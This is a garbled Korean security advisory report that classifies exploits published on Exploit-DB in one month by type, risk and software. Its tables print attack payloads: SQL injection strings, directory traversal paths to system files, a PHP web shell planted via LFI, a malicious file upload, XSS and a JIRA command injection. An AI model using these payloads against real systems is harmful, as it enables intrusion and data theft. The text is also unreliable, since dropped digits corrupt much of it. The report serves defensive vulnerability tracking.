날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

Size: px

Start display at page:

Download "날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약"

승범 내
7 years ago
Views:

1 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가다른취약점과비교하여유난히많았습니다. 세계적으로가장많이사용되고있는 CMS 인 WordPress, 다음으로많이쓰인다고알려진 에서이 SQL Injection 에취약한모습을보여주고있습니다. 내에서는물론특정 에서해당취약점이많이발생되고있으므로 를사용한다면신속히보안패치를적용하여대응하실수있습니다. 다음으로 CMS 에서도역시 SQL Injection 에취약한모습을보이고있습니다. 분석된공격중에는특정파라미터키의배열을조작하여공격에성공하는, 일반적인공격패턴이아닌공격도포함되어있었습니다. 취약점이발견된페이지가관리자페이지로예되므로관련보안패치가나오기전까지해당소스코드의빠른수정이요구됩니다.. 취약점별보고개수취약점 보고개수 Command Injection Directory Traversal File Upload LFI XSS 3 SQL Injection 5 총합계 취약점별보고개수 Command Injection Directory Traversal File Upload LFI XSS SQL Injection. 위험도별분류위험도 보고개수 백분율 % 중 5 65.% 합계 % 위험도별분류 8 5 중 3. 공격난이도별현황공격난이도 보고개수 백분율 % 중 % 하 % 총합계 % 9 공격난이도별현황 7 중 하 7 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 9 4 ManageEngine ElasticSearch Kerio JIRA Oxwall Dream 총합계 3 주요소프트웨어별취약점발생현황 9 ManageEngine ElasticSearch Kerio JIRA Oxwall Dream 4 ** 5개이발생한주요소프트웨어별취약점세 EDB 번호 취약점종류 공격난이도 공격위험도 취약점이름 소프트웨어이름 SQL Injection Real Estate Manager index.php 3858 XSS 하 중 - index.php XSS 취약점 3857 SQL Injection 하 중 - index.php () 3857 SQL Injection 하 중 - index.php () 3857 SQL Injection 하 중 - index.php (3) SQL Injection 3..x index.php SQL Injection 중 중 oomla JNews index.php () SQL Injection 중 oomla JNews index.php () SQL Injection 중 중 oomla JNews index.php (3)

2 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. ElasticSearch Directory Traversal 취약점 /_snapshot/pwn/evl/../../../../../../../../ ElasticSearch ElasticSearch LFI 중 ManageEngine ServiceDesk Plus - FileDownload.jsp LFI 취약점 /workorder/filedownload.jsp?module=support&fname=.. ManageEngin %f..%f..%f..%f..%f..%f..%fwindows%fwin.in e i%00 ManageEngin e ServiceDesk Plus <= SQL Injection 중중 <= v /phpfusion/files/administration/members.php?aid=99ad64 members.php SQL Injection 취약 700ec4ce0&sortby=all&status=0' 점 AND substr(@@version,,)='5 <= v XSS 하중 Management Interface / XSS 취약점 POST / HTTP/. Management Interface title:utf-8:string=</title><script>alert('xss by hyp3rlinx ')</script>&manage_editProperties:method=Sav e Changes File Upload 하중 Dream CMS /pages/en/files-manageradministration/add-file File Upload 취약점 POST /pages/en/files-manager-administration/addfile?path=home HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f Dream Dream CMS dd009908f Content-Disposition: form-data; name="file"; filename="billy.php" Content-Type: application/octet-stream <? phpinfo();?> dd009908f SQL Injection POST /index.php?option=com_realestatemanager&task=showca tegory&catid=50&itemid=3 HTTP/. Real Estate Manager index.php SQL Injection 취약점 Real Estate Manager 3.7 order_direction=asc,(select (CASE WHEN (798=798) THEN ELSE 798*(SELECT 798 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order_field=price SQL Injection 중중 Kerio Control <= report.php /report.php?id='+or+''%3d''%3b+-- Kerio Kerio Control <= SQL Injection 중중 users.php /admin/users.php?req=remove&u_id=03%0and%0(se lect%0*%0from%0(select(sleep(66)))a)--%0& SQL Injection 중중 mailer.php POST /admin/mailer.php HTTP/ agent[]=0 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=send POST /administrator/index.php HTTP/ XSS 하중 - index.php XSS 취약점 option=com_rpl&view=location_manager&format=ajax&ne w_location_en_gb=%onmousemove%3d%alert()% %&new_location_fr_fr=&level=&parent=&function=ad d_location

3 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 SQL Injection 하중 - index.php SQL Injection 취약점 () POST /administrator/index.php HTTP/. option=com_rpl&view=addon_membership_members&for mat=edit&id=84' and = SQL Injection 하중 - index.php SQL Injection 취약점 () POST /administrator/index.php HTTP/. option=com_rpl&view=rpl_multilingual&format=ajax&func tion=data_copy&copy_field=308' and =-- &copy_from=&copy_to=en_gb&copy_method= SQL Injection 하중 - index.php SQL Injection 취약점 (3) POST /administrator/index.php HTTP/. option=com_rpl&view=property_structure&format=ajax&f unction=update_field&id=300&options=0&css=&tip=&st yle=&name=&cat_id=&text_search=0&plisting=0&pshow =' and =--&pwizard=&mode=add SQL Injection 3..x index.php /index.php?option=com_contenthistory&view=history&list [ordering]=&item_id=75&type_id=&list[select]=(select+ +from+(select+count(*),+concat((select+(select+concat(p assword))+from+icalab_users+limit+0,),floor(rand(0)*) )x+from+information_schema.tables+group+by+x)a) 3..x POST /rest/hipchat/integrations/.0/message/render/ HTTP/ Command Injection JIRA and HipChat for JIRA Plugin - /rest/hipchat/integrations/.0/m essage/render/ Command injection 취약점 Content-Type: application/json { "message": " $i8n.getclass().forname(\'java.lang.runtime\').getmethod (\'getruntime\', null).invoke(nㅌ ull, null).exec(\'' + java -jar \\\\ \\public\\payload.jar + '\').waitfor() " } JIRA JIRA product versions: <= version < SQL Injection 중중 oomla JNews index.php () POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf& =asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]= RLIKE (SELECT (CASE WHEN (7097=7097) THEN ELSE 0x8 END))&acc_level[]=9&passwordA=0oYmqypNqP6eU&fr omfrontend=&act=subscribe&subscriber_id=0&user_id= 0&option=com_jnews&task=save&boxchecked=0&Itemid= 88&d65abd4ca0e4f5d3e5af6b5c390ae7= JNews 8.5.

4 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 SQL Injection 중 oomla JNews index.php () POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf& =asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]= AND EXTRACTVALUE(8483,CONCAT(0x5c,0x76b78767,(SEL ECT (ELT(8483=8483,))),0x76b786b7))&acc_level[]=9& passworda=0oymqypnqp6eu&fromfrontend=&act=subs cribe&subscriber_id=0&user_id=0&option=com_jnews&tas k=save&boxchecked=0&itemid=88&d65abd4ca0e4f5d3 e5af6b5c390ae7= JNews SQL Injection 중중 oomla JNews index.php (3) POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf& =asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]=(SELECT * FROM (SELECT(SLEEP(5)))Qrax)&acc_level[]=9&passwordA=0 oymqypnqp6eu&fromfrontend=&act=subscribe&subscri ber_id=0&user_id=0&option=com_jnews&task=save&boxc hecked=0&itemid=88&d65abd4ca0e4f5d3e5af6b5c390 ae7= JNews XSS 하중 Oxwall /admin/pages/maintenance XSS 취약점 POST /admin/pages/maintenance HTTP/. Oxwall Oxwall.7.4 form_name=maintenance&maintenance_enable=on&save =Save&maintenance_text=<script>alert('ImmuniWeb');</sc ript> LFI 하중 CMS - admin_editor.php LFI 취약점 POST /pligg-cms-master/admin/admin_editor.php HTTP/. CMS the_file=..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%fvar%fwww%fhtml%fpligg-cmsmaster%f404.php&updatedfile=<?php passthru($_get['x']);?>&isempty=&save=save+changes SQL Injection CMS - story.php SQL Injection 취약점 /pligg-cms-master/story.php?title=googleblabla&reply=&comment_id=%0union%0all%0sele ct%0,,,,,,,password,password,%0from%0m ysql.user%0%3 CMS POST /pligg-cms-master/admin/admin_users.php HTTP/ SQL Injection CMS - admin_users.php SQL Injection 취약점 CMS frmsubmit=userlist&admin_acction=&token=valid_csrf_ TOKEN&all=on&enabled[ AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK( ,version()),null) %3]=

5 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 SQL Injection CMS - upload.php POST /pligg-cms-master/modules/upload/upload.php HTTP/. CMS id=&number=&comment=' AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK( ,version()),null) %3

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.